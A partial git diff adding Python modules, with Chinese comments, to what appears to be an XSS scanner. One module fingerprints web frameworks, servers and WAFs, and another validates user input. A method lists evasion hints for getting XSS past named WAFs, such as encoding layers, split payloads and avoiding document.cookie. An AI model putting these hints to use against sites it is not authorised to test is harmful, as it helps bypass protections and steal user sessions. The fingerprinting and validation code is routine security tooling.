+                ('script', {'src': re.compile(r'wp-includes')}),
+                ('link', {'rel': 'https://api.w.org/'}),
+                ('meta', {'property': 'og:site_name'}),
+                ('body', {'class': re.compile(r'wordpress')})
+            ],
+            'Laravel': [
+                ('input', {'name': '_token'}),
+                ('meta', {'name': 'csrf-token'}),
+                ('script', {'src': re.compile(r'vendor/laravel')}),
+                ('Set-Cookie', re.compile(r'laravel_session', re.I))
+            ],
+            'Django': [
+                ('input', {'name': 'csrfmiddlewaretoken'}),
+                ('meta', {'name': 'csrf-token'}),
+                ('X-Frame-Options', 'SAMEORIGIN')
+            ],
+            'Flask': [
+                ('form', {'action': re.compile(r'\/[a-z0-9_]+\/?')}),
+                ('Set-Cookie', re.compile(r'session=', re.I))
+            ],
+            'Python': [
+                ('Server', re.compile(r'(Python|Werkzeug|Django|Tornado|Flask|CherryPy)', re.I)),
+                ('X-Powered-By', re.compile(r'(Python|Werkzeug|Django|Tornado|Flask|CherryPy)', re.I))
+            ],
+            'ASP.NET': [
+                ('X-Powered-By', re.compile(r'ASP\.NET', re.I)),
+                ('X-AspNet-Version', re.compile(r'.*')),
+                ('Set-Cookie', re.compile(r'ASP\.NET_SessionId', re.I)),
+                ('form', {'action': re.compile(r'\.aspx')}),
+                ('input', {'name': '__VIEWSTATE'})
+            ],
+            'Node.js': [
+                ('X-Powered-By', re.compile(r'Express', re.I)),
+                ('Set-Cookie', re.compile(r'connect\.sid', re.I))
+            ],
+            'Ruby on Rails': [
+                ('X-Powered-By', re.compile(r'Phusion Passenger|Ruby|Rails', re.I)),
+                ('Set-Cookie', re.compile(r'_session_id', re.I)),
+                ('meta', {'name': 'csrf-param', 'content': 'authenticity_token'})
+            ],
+            'Java': [
+                ('X-Powered-By', re.compile(r'(JSP|Servlet|Tomcat|JBoss|GlassFish|WebLogic|WebSphere|Jetty)', re.I)),
+                ('Server', re.compile(r'(Tomcat|JBoss|GlassFish|WebLogic|WebSphere|Jetty)', re.I)),
+                ('Set-Cookie', re.compile(r'JSESSIONID', re.I))
+            ],
+            'Go': [
+                ('Server', re.compile(r'(go httpserver)', re.I)),
+                ('X-Powered-By', re.compile(r'(go|gin|echo)', re.I))
+            ]
+        }
+        
+        # 服务器特征
+        self.server_technologies = {
+            'Nginx': [
+                ('Server', re.compile(r'nginx', re.I))
+            ],
+            'Apache': [
+                ('Server', re.compile(r'apache', re.I))
+            ],
+            'IIS': [
+                ('Server', re.compile(r'IIS', re.I))
+            ],
+            'LiteSpeed': [
+                ('Server', re.compile(r'LiteSpeed', re.I))
+            ],
+            'Cloudflare': [
+                ('Server', re.compile(r'cloudflare', re.I)),
+                ('CF-RAY', re.compile(r'.*')),
+                ('CF-Cache-Status', re.compile(r'.*'))
+            ],
+            'Varnish': [
+                ('X-Varnish', re.compile(r'.*')),
+                ('X-Varnish-Cache', re.compile(r'.*'))
+            ]
+        }
+        
+        # WAF特征
+        self.waf_technologies = {
+            'Cloudflare': [
+                ('Server', re.compile(r'cloudflare', re.I)),
+                ('CF-RAY', re.compile(r'.*'))
+            ],
+            'ModSecurity': [
+                ('Server', re.compile(r'mod_security', re.I)),
+                ('X-Mod-Security', re.compile(r'.*'))
+            ],
+            'Sucuri': [
+                ('X-Sucuri-ID', re.compile(r'.*')),
+                ('X-Sucuri-Cache', re.compile(r'.*'))
+            ],
+            'Imperva': [
+                ('X-Iinfo', re.compile(r'.*')),
+                ('Set-Cookie', re.compile(r'incap_ses', re.I))
+            ],
+            'Akamai': [
+                ('X-Akamai-Transformed', re.compile(r'.*')),
+                ('Set-Cookie', re.compile(r'ak_bmsc', re.I))
+            ],
+            'F5 BIG-IP': [
+                ('Set-Cookie', re.compile(r'BIGipServer', re.I)),
+                ('Server', re.compile(r'BigIP', re.I))
+            ],
+            'Barracuda': [
+                ('Set-Cookie', re.compile(r'barra_counter_session', re.I))
+            ]
+        }
+        
+    def detect(self, response, content=None):
+        """
+        检测网页使用的技术
+        
+        Args:
+            response: HTTP响应对象
+            content: HTML内容(可选)
+            
+        Returns:
+            dict: 检测到的技术信息
+        """
+        if not response:
+            return {}
+            
+        results = {
+            'frontend': [],
+            'backend': [],
+            'server': [],
+            'waf': []
+        }
+        
+        # 提取HTML内容
+        html_content = content or response.text
+        
+        # 解析HTML
+        try:
+            soup = BeautifulSoup(html_content, 'html.parser')
+        except Exception as e:
+            logger.error(f"解析HTML时发生错误: {str(e)}")
+            soup = None
+        
+        # 检测前端框架
+        if soup:
+            for framework, patterns in self.frontend_frameworks.items():
+                for tag_name, attrs in patterns:
+                    elements = soup.find_all(tag_name, attrs)
+                    if elements:
+                        if framework not in results['frontend']:
+                            results['frontend'].append(framework)
+                            break
+        
+        # 检测后端技术
+        headers = response.headers
+        
+        # 基于HTTP头的检测
+        for tech, patterns in self.backend_technologies.items():
+            for header_name, pattern in patterns:
+                if header_name in headers:
+                    if isinstance(pattern, re.Pattern) and pattern.search(headers[header_name]):
+                        if tech not in results['backend']:
+                            results['backend'].append(tech)
+                            break
+        
+        # 基于HTML的后端技术检测
+        if soup:
+            for tech, patterns in self.backend_technologies.items():
+                if tech in results['backend']:
+                    continue
+                    
+                for tag_name, attrs in patterns:
+                    if tag_name in ['link', 'a', 'form', 'input', 'meta', 'script', 'body']:
+                        elements = soup.find_all(tag_name, attrs)
+                        if elements:
+                            if tech not in results['backend']:
+                                results['backend'].append(tech)
+                                break
+        
+        # 检测服务器技术
+        for server, patterns in self.server_technologies.items():
+            for header_name, pattern in patterns:
+                if header_name in headers:
+                    if isinstance(pattern, re.Pattern) and pattern.search(headers[header_name]):
+                        if server not in results['server']:
+                            results['server'].append(server)
+                            break
+        
+        # 检测WAF
+        for waf, patterns in self.waf_technologies.items():
+            for header_name, pattern in patterns:
+                if header_name in headers:
+                    if isinstance(pattern, re.Pattern) and pattern.search(headers[header_name]):
+                        if waf not in results['waf']:
+                            results['waf'].append(waf)
+                            break
+                            
+        # 添加详细检测信息
+        self._enhance_detection(results, soup, headers)
+        
+        return results
+    
+    def _enhance_detection(self, results, soup, headers):
+        """
+        增强检测，添加更多详细信息
+        
+        Args:
+            results: 已检测的结果
+            soup: BeautifulSoup对象
+            headers: HTTP响应头
+        """
+        # 检测JavaScript库的版本
+        if soup:
+            # 检测React版本
+            if 'React' in results['frontend']:
+                script_tags = soup.find_all('script')
+                for script in script_tags:
+                    if script.string and 'React.version' in script.string:
+                        version_match = re.search(r'React.version\s*=\s*[\'"]([^\'"]+)[\'"]', script.string)
+                        if version_match:
+                            results['frontend'].remove('React')
+                            results['frontend'].append(f"React {version_match.group(1)}")
+                            break
+            
+            # 检测Angular版本
+            if 'Angular' in results['frontend']:
+                for script in soup.find_all('script'):
+                    if script.string and 'angular.version' in script.string:
+                        version_match = re.search(r'angular.version\s*=\s*\{[^\}]*full:\s*[\'"]([^\'"]+)[\'"]', script.string)
+                        if version_match:
+                            results['frontend'].remove('Angular')
+                            results['frontend'].append(f"Angular {version_match.group(1)}")
+                            break
+            
+            # WordPress版本
+            if 'WordPress' in results['backend']:
+                meta_tags = soup.find_all('meta', {'name': 'generator'})
+                for meta in meta_tags:
+                    content = meta.get('content', '')
+                    if 'WordPress' in content:
+                        version_match = re.search(r'WordPress\s*([0-9\.]+)', content)
+                        if version_match:
+                            results['backend'].remove('WordPress')
+                            results['backend'].append(f"WordPress {version_match.group(1)}")
+                            break
+        
+        # 检测服务器版本
+        if 'Server' in headers:
+            server_header = headers['Server']
+            
+            # Nginx版本
+            if 'Nginx' in results['server']:
+                version_match = re.search(r'nginx/([0-9\.]+)', server_header, re.I)
+                if version_match:
+                    results['server'].remove('Nginx')
+                    results['server'].append(f"Nginx {version_match.group(1)}")
+            
+            # Apache版本
+            elif 'Apache' in results['server']:
+                version_match = re.search(r'Apache/([0-9\.]+)', server_header, re.I)
+                if version_match:
+                    results['server'].remove('Apache')
+                    results['server'].append(f"Apache {version_match.group(1)}")
+    
+    def get_waf_bypass_techniques(self, detected_waf):
+        """
+        根据检测到的WAF，返回可能的绕过技术
+        
+        Args:
+            detected_waf: 检测到的WAF列表
+            
+        Returns:
+            dict: WAF绕过技术
+        """
+        bypass_techniques = {}
+        
+        for waf in detected_waf:
+            if waf == 'Cloudflare':
+                bypass_techniques['Cloudflare'] = [
+                    '使用不同的编码方式: HTML, URL, Unicode, Base64等',
+                    '利用换行符分割XSS Payload',
+                    '使用JavaScript事件处理程序的大小写混合形式',
+                    '使用不同的HTML标签（避免常见的如script, img, iframe）',
+                    '尝试使用较少被检测的事件如onmouseover, onerror, onwheel等'
+                ]
+            elif waf == 'ModSecurity':
+                bypass_techniques['ModSecurity'] = [
+                    '使用JavaScript事件处理程序的不同形式',
+                    '使用HTML实体编码',
+                    '分割Payload: < s c r i p t >',
+                    '使用JavaScript的eval函数和字符串操作函数',
+                    '使用CSS注入配合XSS'
+                ]
+            elif waf == 'Imperva':
+                bypass_techniques['Imperva'] = [
+                    '使用JavaScript原型链污染技术',
+                    '避免使用关键词(alert, document.cookie等)',
+                    '使用JavaScript的间接调用方法',
+                    '使用多层编码: URL编码 + HTML编码 + Unicode编码',
+                    '利用长字符串和重复字符迷惑WAF规则'
+                ]
+            elif waf == 'F5 BIG-IP':
+                bypass_techniques['F5 BIG-IP'] = [
+                    '使用非标准事件处理程序',
+                    'DOM XSS手法通常更能绕过F5的防护',
+                    '使用JavaScript模板字符串',
+                    '使用JavaScript的Function构造函数',
+                    '利用特定浏览器的解析差异'
+                ]
+            elif waf == 'Akamai':
+                bypass_techniques['Akamai'] = [
+                    '利用JavaScript的变量和函数名混淆',
+                    '使用CDATA和注释规避特征检测',
+                    '避免直接使用javascript:伪协议',
+                    '使用data:text/html;base64,...编码',
+                    '利用JavaScript中的字符串拼接和动态执行'
+                ]
+        
+        return bypass_techniques 
\ No newline at end of file
diff --git a/xss_scanner/utils/validator.py b/xss_scanner/utils/validator.py
new file mode 100644
index 0000000..24b9071
--- /dev/null
+++ b/xss_scanner/utils/validator.py
@@ -0,0 +1,228 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+参数验证模块，负责验证用户输入的参数
+"""
+
+import re
+import os
+import logging
+from urllib.parse import urlparse
+
+logger = logging.getLogger('xss_scanner')
+
+def validate_target(target):
+    """
+    验证目标URL是否有效
+    
+    Args:
+        target: 目标URL
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not target:
+        return False
+        
+    # 检查URL格式
+    if not target.startswith(('http://', 'https://')):
+        logger.warning(f"无效的URL格式: {target}，URL必须以http://或https://开头")
+        return False
+        
+    # 解析URL
+    try:
+        parsed_url = urlparse(target)
+        if not parsed_url.netloc:
+            logger.warning(f"无效的URL: {target}，缺少域名")
+            return False
+    except Exception as e:
+        logger.warning(f"URL解析失败: {target} - {str(e)}")
+        return False
+        
+    return True
+
+def validate_file_path(file_path, check_exists=True, check_write=False):
+    """
+    验证文件路径是否有效
+    
+    Args:
+        file_path: 文件路径
+        check_exists: 是否检查文件是否存在
+        check_write: 是否检查文件是否可写
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not file_path:
+        return False
+        
+    # 检查文件是否存在
+    if check_exists and not os.path.exists(file_path):
+        logger.warning(f"文件不存在: {file_path}")
+        return False
+        
+    # 检查文件是否可写
+    if check_write:
+        try:
+            # 检查文件是否可写
+            if os.path.exists(file_path):
+                if not os.access(file_path, os.W_OK):
+                    logger.warning(f"文件不可写: {file_path}")
+                    return False
+            else:
+                # 检查目录是否可写
+                dir_path = os.path.dirname(file_path)
+                if dir_path and not os.access(dir_path, os.W_OK):
+                    logger.warning(f"目录不可写: {dir_path}")
+                    return False
+        except Exception as e:
+            logger.warning(f"检查文件权限失败: {file_path} - {str(e)}")
+            return False
+            
+    return True
+
+def validate_ip(ip):
+    """
+    验证IP地址是否有效
+    
+    Args:
+        ip: IP地址
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not ip:
+        return False
+        
+    # IPv4正则表达式
+    ipv4_pattern = r'^(\d{1,3}\.){3}\d{1,3}$'
+    
+    # 检查格式
+    if not re.match(ipv4_pattern, ip):
+        return False
+        
+    # 检查每个段的范围
+    segments = ip.split('.')
+    for segment in segments:
+        if not 0 <= int(segment) <= 255:
+            return False
+            
+    return True
+
+def validate_port(port):
+    """
+    验证端口号是否有效
+    
+    Args:
+        port: 端口号
+        
+    Returns:
+        bool: 是否有效
+    """
+    try:
+        port = int(port)
+        return 1 <= port <= 65535
+    except:
+        return False
+
+def validate_proxy(proxy):
+    """
+    验证代理设置是否有效
+    
+    Args:
+        proxy: 代理设置
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not proxy:
+        return False
+        
+    # 检查代理格式
+    if not proxy.startswith(('http://', 'https://', 'socks4://', 'socks5://')):
+        logger.warning(f"无效的代理格式: {proxy}，代理必须以http://、https://、socks4://或socks5://开头")
+        return False
+        
+    # 解析代理
+    try:
+        parsed_proxy = urlparse(proxy)
+        if not parsed_proxy.netloc:
+            logger.warning(f"无效的代理: {proxy}，缺少主机名")
+            return False
+    except Exception as e:
+        logger.warning(f"代理解析失败: {proxy} - {str(e)}")
+        return False
+        
+    return True
+
+def validate_regex(pattern):
+    """
+    验证正则表达式是否有效
+    
+    Args:
+        pattern: 正则表达式
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not pattern:
+        return False
+        
+    try:
+        re.compile(pattern)
+        return True
+    except re.error:
+        return False
+
+def validate_headers(headers):
+    """
+    验证HTTP头是否有效
+    
+    Args:
+        headers: HTTP头，格式：Header1:Value1;Header2:Value2
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not headers:
+        return False
+        
+    try:
+        # 分割HTTP头
+        header_pairs = headers.split(';')
+        for header in header_pairs:
+            if header.strip() and ':' not in header:
+                logger.warning(f"无效的HTTP头格式: {header}，应为Header:Value格式")
+                return False
+                
+        return True
+    except Exception as e:
+        logger.warning(f"验证HTTP头失败: {str(e)}")
+        return False
+
+def validate_cookies(cookies):
+    """
+    验证Cookie是否有效
+    
+    Args:
+        cookies: Cookie，格式：name1=value1; name2=value2
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not cookies:
+        return False
+        
+    try:
+        # 分割Cookie
+        cookie_pairs = cookies.split(';')
+        for cookie in cookie_pairs:
+            if cookie.strip() and '=' not in cookie:
+                logger.warning(f"无效的Cookie格式: {cookie}，应为name=value格式")
+                return False
+                
+        return True
+    except Exception as e:
+        logger.warning(f"验证Cookie失败: {str(e)}")
+        return False 
\ No newline at end of file